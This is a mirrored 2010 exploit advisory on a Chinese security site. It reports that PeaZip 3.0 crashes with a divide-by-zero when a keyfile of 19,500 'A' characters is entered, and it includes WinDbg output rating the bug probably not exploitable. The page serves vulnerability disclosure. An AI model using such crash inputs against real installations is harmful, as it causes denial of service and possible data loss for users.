首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Peazip 3.0 DOS attack
来源:vfocus.net 作者:Richard 发布时间:2010-03-31  

Peazip 3.0 suffers from a division by zero attack resulting in denial of service vulnerability and possibly loss of data.

To trigger the vulnerability open up the application, click tools, enter password / keyfile.

password: test

confirm password: test

keyfile:"A" * 19500

----------------------------------------------------------------------------------------------------

(d80.8c): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=00000032 ecx=00000000 edx=00000000 esi=0173f754 edi=01dd7dd8
eip=00524ea2 esp=0173f438 ebp=0173f440 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x124ea2:
00524ea2 f7f9 idiv eax,ecx
0:000> !exploitable
No export exploitable found
0:000> !load winext/msec.dll
0:000> !exploitable
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\USER32.dll -
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Integer Divide By Zero starting at image00400000+0x0000000000124ea2 (Hash=0x00020e6f.0x637a584a)

This is a divide by zero, and is probably not exploitable.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Proxomitron 4.5 DOS attack
·RM Downloader 3.0.2.1 (.asx) L
·Jira Atlassian File Attachment
·All to All Audio Convertor v2.
·Firefox 3.5 Stack Overflow Exp
·Shadow Stream Recorder 3.0.1.7
·ASX to MP3 Converter Version 3
·xwine v1.0.1 (.exe file) Local
·Xilisoft Blackberry Ring Tone
·ASX to MP3 Converter Version 3
·Easy Icon Maker .ico File Read
·Stud_PE <= v2.6.05 Stack Overf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved